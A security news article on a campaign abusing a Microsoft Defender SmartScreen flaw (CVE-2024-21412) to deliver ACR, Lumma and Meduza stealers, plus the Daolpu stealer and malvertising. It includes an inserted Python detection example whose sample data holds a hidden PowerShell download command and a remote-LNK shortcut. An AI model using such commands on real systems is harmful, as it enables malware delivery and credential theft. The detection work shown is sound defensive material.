Exploit in Microsoft Defender Weakness Used to Distribute ACR, Lumma, and Meduza Stealers

Jul 24, 2024NewsroomMalvertising / Threat Intelligence

A recently patched security flaw in Microsoft Defender SmartScreen has been exploited in a new campaign to distribute information stealers such as ACR Stealer, Lumma, and Meduza.

Fortinet FortiGuard Labs detected the campaign, which targeted Spain, Thailand, and the U.S. and used malicious files to exploit CVE-2024-21412 (CVSS score: 8.1).

This critical vulnerability allows an attacker to bypass SmartScreen protection and drop malicious payloads. Microsoft addressed the issue in its security updates released in February 2024.

“To start with, attackers entice victims to click on a manipulated link leading to a URL file intended to download an LNK file,” security researcher Cara Lin said. “This LNK file then fetches an executable file that holds an [HTML Application] script.”

The HTA file serves as a conduit to decode and execute PowerShell code responsible for retrieving a decoy PDF file and a shellcode injector that, in turn, either leads to the deployment of Meduza Stealer or Hijack Loader, which subsequently launches ACR Stealer or Lumma.
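As an added defender-side example (not code from Fortinet or the article), the following Python checks triage the first and middle stages of this chain: it flags an Internet Shortcut (.url) file whose target is a remote LNK, and flags powershell.exe spawned by mshta.exe with a download command line. The .url content, the process events and the 203.0.113.10 address are constructed samples, not indicators from the campaign.

```python
import re
from configparser import ConfigParser

# Targets that live off the host: UNC paths, WebDAV/SMB-style file URLs, or http(s) URLs.
REMOTE_TARGET = re.compile(r"^(?:\\\\|file://[^/]|https?://|smb://)", re.IGNORECASE)
STAGER_EXTENSIONS = {"lnk", "url", "exe", "hta"}
DOWNLOAD_CMDLET = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b|\bcurl\b", re.IGNORECASE)

def url_file_is_suspicious(content: str) -> bool:
    """True when an Internet Shortcut (.url) file points at a remote stager such as an LNK.
    The chain above starts with a .url file that fetches an LNK, so this is the first
    artifact a responder can triage."""
    parser = ConfigParser(interpolation=None, strict=False)
    parser.read_string(content)
    if not parser.has_section("InternetShortcut"):
        return False
    target = parser.get("InternetShortcut", "URL", fallback="").strip()
    if not REMOTE_TARGET.match(target):
        return False
    ext = target.rsplit(".", 1)[-1].lower() if "." in target else ""
    return ext in STAGER_EXTENSIONS

def flag_mshta_powershell(events):
    """Return PIDs of powershell.exe processes spawned by mshta.exe with a download
    command line, i.e. the HTA -> PowerShell stage described above.
    Each event is a dict with pid, ppid, image and cmdline (Sysmon Event ID 1 style)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (parent and parent["image"].lower().endswith("mshta.exe")
                and e["image"].lower().endswith("powershell.exe")
                and DOWNLOAD_CMDLET.search(e["cmdline"])):
            hits.append(e["pid"])
    return hits

# Constructed sample inputs (not indicators from the campaign).
SAMPLE_URL_FILE = "[InternetShortcut]\nURL=file://203.0.113.10/share/invoice.lnk\nIconIndex=0\n"
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://example.com/\n"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\victim\AppData\Local\Temp\update.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden Invoke-WebRequest http://203.0.113.10/decoy.pdf"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]
```

Running `url_file_is_suspicious` over quarantined shortcuts and `flag_mshta_powershell` over process-creation telemetry gives two independent detection points for the same chain.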

ACR Stealer, assessed to be an evolved version of GrMsk Stealer, was advertised in late March 2024 by a threat actor named SheldIO on the Russian-language underground forum RAMP.

“This ACR stealer conceals its [command-and-control] using a dead drop resolver (DDR) technique on the Steam community website,” Lin explained, highlighting its capacity to extract data from web browsers, cryptocurrency wallets, messaging applications, FTP clients, email platforms, VPN services, and password management tools.

It's worth noting that recent Lumma Stealer attacks have also been observed using the same technique, making it easier for the attackers to change the C2 domains at any time and making the infrastructure more robust, according to the AhnLab Security Intelligence Center (ASEC).

The development coincides with CrowdStrike's disclosure that threat actors are exploiting last week's outage to distribute a previously undocumented information stealer known as Daolpu, the latest instance of the continuing fallout from the faulty update that has affected millions of Windows devices.

The attack involves a macro-laced Microsoft Word document that masquerades as a Microsoft recovery manual listing legitimate instructions issued by the Windows maker to resolve the issue, using it as a lure to activate the infection process.

The DOCM file, upon opening, runs the macro to retrieve a second-stage DLL file from a remote server, which is decoded to launch Daolpu, a stealer malware designed to harvest credentials and cookies from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based web browsers.

The development comes amid the emergence of new stealer malware families such as Braodo and DeerStealer, even as threat actors are exploiting malvertising techniques promoting legitimate software like Microsoft Teams to deploy Atomic Stealer.

“As cybercriminals intensify their distribution campaigns, downloading applications from search engines becomes more perilous,” Malwarebytes researcher Jérôme Segura stated. “Users have to steer through malvertising (sponsored results) and SEO poisoning (compromised websites).”
